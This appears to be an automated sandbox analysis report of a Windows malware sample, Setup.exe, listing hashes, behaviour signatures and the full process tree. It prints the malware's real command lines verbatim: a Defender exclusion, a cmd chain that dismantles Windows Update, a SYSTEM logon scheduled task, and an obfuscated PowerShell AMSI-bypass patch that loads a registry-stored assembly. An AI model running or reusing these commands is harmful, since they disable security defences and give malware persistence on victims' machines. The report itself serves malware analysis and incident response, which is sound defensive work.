Analysis
- max time kernel: 17s
- max time network: 71s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 29-04-2022 11:07
Static task: static1
Behavioral task: behavioral1
Sample: Setup.exe
Resource: win7-20220414-en
General
- Target: Setup.exe
- Size: 3.3MB
- MD5: 89253fded8cd7633cd774b34ec00d7ae
- SHA1: 36579483553c0f703604f439d9b5b46f088ab543
- SHA256: d4394564000ca31d1d78e78322c3c7bd6287bd0d700b02916cc889ddc2bf22d4
- SHA512: c79bb7809db89a10d65b268816336f3d952277ec55d65e1e21e6ff2a690c3767fdde08586daa3d4f77ee6d2d85d35aa8d870389ffcf7fb2888de5d16362e616f
Malware Config
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  Processes: reg.exe
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
- Executes dropped EXE (2 IoCs)
  Processes: update.exe, iexplore.exe
  pid | process
  2632 | update.exe
  1832 | iexplore.exe
- Possible privilege escalation attempt (2 IoCs)
  Processes: takeown.exe, icacls.exe
  pid | process
  1508 | takeown.exe
  2640 | icacls.exe
- Stops running service(s) (3 TTPs)
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: iexplore.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | iexplore.exe
- Modifies file permissions (1 TTPs, 2 IoCs)
  Processes: takeown.exe, icacls.exe
  pid | process
  1508 | takeown.exe
  2640 | icacls.exe
- Checks whether UAC is enabled
  Processes: iexplore.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | iexplore.exe
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  12 | ip-api.com
- Suspicious use of SetThreadContext (2 IoCs)
  Processes: update.exe, iexplore.exe
  description | pid | process | target process
  PID 2632 set thread context of 1636 | 2632 | update.exe | AppLaunch.exe
  PID 1832 set thread context of 4088 | 1832 | iexplore.exe | conhost.exe
- Drops file in Windows directory (4 IoCs)
  Processes: conhost.exe
  description | ioc | process
  File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoCs)
  Processes: WerFault.exe
  pid | pid_target | process | target process
  1052 | 2632 | WerFault.exe | update.exe
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies data under HKEY_USERS (34 IoCs)
  Processes: powershell.EXE
- Modifies registry key (1 TTPs, 8 IoCs)
  Processes: reg.exe (8 instances)
  pid | process
  3380 | reg.exe
  3412 | reg.exe
  2540 | reg.exe
  3152 | reg.exe
  1400 | reg.exe
  2044 | reg.exe
  3260 | reg.exe
  4336 | reg.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, iexplore.exe, powershell.EXE
  pid | process
  4016 | powershell.exe
  4016 | powershell.exe
  1832 | iexplore.exe
  3340 | powershell.EXE
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: powershell.exe, AppLaunch.exe, iexplore.exe, takeown.exe, powershell.EXE
  description | pid | process
  Token: SeDebugPrivilege | 4016 | powershell.exe
  Token: SeDebugPrivilege | 1636 | AppLaunch.exe
  Token: SeDebugPrivilege | 1832 | iexplore.exe
  Token: SeTakeOwnershipPrivilege | 1508 | takeown.exe
  Token: SeDebugPrivilege | 3340 | powershell.EXE
- Suspicious use of WriteProcessMemory (55 IoCs)
  Processes: Setup.exe, update.exe, iexplore.exe, cmd.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Setup.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\update.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\update.exe
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          - Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 348
          - Program crash
    - C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      - Executes dropped EXE
      - Checks computer location settings
      - Checks whether UAC is enabled
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        - C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
          The -EncodedCommand argument is base64 of UTF-16LE text and decodes to: <#ghd#> Add-MpPreference <#ylwp#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#fh#> -Force <#dlui#> (a Microsoft Defender exclusion covering the user profile and the whole system drive, with empty comment blocks inserted between tokens).
          - Suspicious use of WriteProcessMemory
            - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
        - C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          This chain stops and deletes the Windows Update (wuauserv, UsoSvc), WaaS Medic, BITS and Delivery Optimization (dosvc) services, takes ownership of and renames WaaSMedicSvc.dll so the update-repair component cannot restore them, sets Windows Update policy values that turn off automatic updates, and disables the update-related scheduled tasks.
          - Suspicious use of WriteProcessMemory
            - C:\Windows\system32\sc.exe
              Command line: sc stop UsoSvc
            - C:\Windows\system32\sc.exe
              Command line: sc stop WaaSMedicSvc
            - C:\Windows\system32\sc.exe
              Command line: sc stop wuauserv
            - C:\Windows\system32\sc.exe
              Command line: sc stop bits
            - C:\Windows\system32\sc.exe
              Command line: sc stop dosvc
            - C:\Windows\system32\reg.exe
              Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              - Modifies registry key
            - C:\Windows\system32\reg.exe
              Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              - Modifies registry key
            - C:\Windows\system32\reg.exe
              Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              - Modifies security service
              - Modifies registry key
            - C:\Windows\system32\reg.exe
              Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              - Modifies registry key
            - C:\Windows\system32\reg.exe
              Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              - Modifies registry key
            - C:\Windows\system32\takeown.exe
              Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
              - Possible privilege escalation attempt
              - Modifies file permissions
              - Suspicious use of AdjustPrivilegeToken
            - C:\Windows\system32\icacls.exe
              Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              - Possible privilege escalation attempt
              - Modifies file permissions
            - C:\Windows\system32\reg.exe
              Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              - Modifies registry key
            - C:\Windows\system32\reg.exe
              Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              - Modifies registry key
            - C:\Windows\system32\reg.exe
              Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              - Modifies registry key
        - C:\Windows\System32\conhost.exe
          Command line: C:\Windows\System32\conhost.exe
          - Drops file in Windows directory
        - C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
          - Suspicious use of WriteProcessMemory
            - C:\Windows\system32\schtasks.exe
              Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
              - Creates scheduled task(s)
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2632 -ip 2632
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rgVLhzRGqmCB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ECMixJQqOVZAYy,[Parameter(Position=1)][Type]$SOUsTYUfhX)$JNSMBFcgWiK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JNSMBFcgWiK.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ECMixJQqOVZAYy).SetImplementationFlags('Runtime,Managed');$JNSMBFcgWiK.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$SOUsTYUfhX,$ECMixJQqOVZAYy).SetImplementationFlags('Runtime,Managed');Write-Output $JNSMBFcgWiK.CreateType();}$WNnRkZkaCFbya=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmFPZuOVUnpnxd=$WNnRkZkaCFbya.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HoblDAfjqupcAyIgVmk=rgVLhzRGqmCB @([String])([IntPtr]);$uQpJaYCpPYcOOgSELwPfXa=rgVLhzRGqmCB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VYajwTVhRRc=$WNnRkZkaCFbya.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bjeWeVTFwFmPER=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$VYajwTVhRRc,[Object]('Load'+'LibraryA')));$ThmqsWVTNazpYrtwI=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$VYajwTVhRRc,[Object]('Vir'+'tual'+'Pro'+'tect')));$UARpbQm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bjeWeVTFwFmPER,$HoblDAfjqupcAyIgVmk).Invoke('a'+'m'+'si.dll');$ipeeFeutKsHpBztGa=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$UARpbQm,[Object]('Ams'+'iSc'+'an'+'Buffer')));$sJCLtfKMXt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ThmqsWVTNazpYrtwI,$uQpJaYCpPYcOOgSELwPfXa).Invoke($ipeeFeutKsHpBztGa,[uint32]8,4,[ref]$sJCLtfKMXt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ipeeFeutKsHpBztGa,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ThmqsWVTNazpYrtwI,$uQpJaYCpPYcOOgSELwPfXa).Invoke($ipeeFeutKsHpBztGa,[uint32]8,0x20,[ref]$sJCLtfKMXt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oAbeXmWcqHzj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PtEfDoPYGAPRqY,[Parameter(Position=1)][Type]$PgCIKxkVGh)$ELVmOlQVBOA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ELVmOlQVBOA.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$PtEfDoPYGAPRqY).SetImplementationFlags('Runtime,Managed');$ELVmOlQVBOA.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$PgCIKxkVGh,$PtEfDoPYGAPRqY).SetImplementationFlags('Runtime,Managed');Write-Output $ELVmOlQVBOA.CreateType();}$TIqaDAIzKvAsB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$bDbtXLuARLhuDi=$TIqaDAIzKvAsB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KNlolZMthrbtZWpnJHq=oAbeXmWcqHzj @([String])([IntPtr]);$fjDAjQZEVRYAsOlHRjnGmi=oAbeXmWcqHzj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KjcmTfepfPy=$TIqaDAIzKvAsB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$SlCEpGRzIncMAf=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$KjcmTfepfPy,[Object]('Load'+'LibraryA')));$LSpmQLTuaHEKDWJRW=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$KjcmTfepfPy,[Object]('Vir'+'tual'+'Pro'+'tect')));$sirsngP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SlCEpGRzIncMAf,$KNlolZMthrbtZWpnJHq).Invoke('a'+'m'+'si.dll');$NjJpnnpvCtRsxGcuP=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$sirsngP,[Object]('Ams'+'iSc'+'an'+'Buffer')));$JRrhPiawcD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LSpmQLTuaHEKDWJRW,$fjDAjQZEVRYAsOlHRjnGmi).Invoke($NjJpnnpvCtRsxGcuP,[uint32]8,4,[ref]$JRrhPiawcD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NjJpnnpvCtRsxGcuP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LSpmQLTuaHEKDWJRW,$fjDAjQZEVRYAsOlHRjnGmi).Invoke($NjJpnnpvCtRsxGcuP,[uint32]8,0x20,[ref]$JRrhPiawcD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  Both powershell.EXE command lines run the same script, differing only in the byte stub written for 32-bit (SysWOW64) and 64-bit (System32) hosts: they resolve AmsiScanBuffer in amsi.dll through reflection, make its first bytes writable with VirtualProtect, overwrite them with a stub that returns 0x80070057 (E_INVALIDARG) so that AMSI scans fail instead of flagging content, restore the protection, and then load a .NET assembly stored in the registry value HKLM\SOFTWARE\dialerstager and invoke its entry point. That registry value, together with the dialersvc32.job and dialersvc64.job task files listed above, is the on-disk artifact a responder should collect.
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\dllhost.exe
  Command line: C:\Windows\System32\dllhost.exe /Processid:{3005ff32-a7da-499f-b11b-cefd049e4e92}
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\iexplore.exe
  Filesize: 2.3MB
  MD5: ed73affd7b0ec16ed1f1207f19ba9d77
  SHA1: 1f4f3f70f3c2b2db3c543ae31f243cb18ae85095
  SHA256: 1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e
  SHA512: 1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642
- C:\Users\Admin\AppData\Local\Temp\update.exe
  Filesize: 1.9MB
  MD5: 6c08423aa3ca9067cc5583dc28f329fa
  SHA1: 20017a7855f2c082c6e6ce3223729123ce604879
  SHA256: b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f
  SHA512: eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0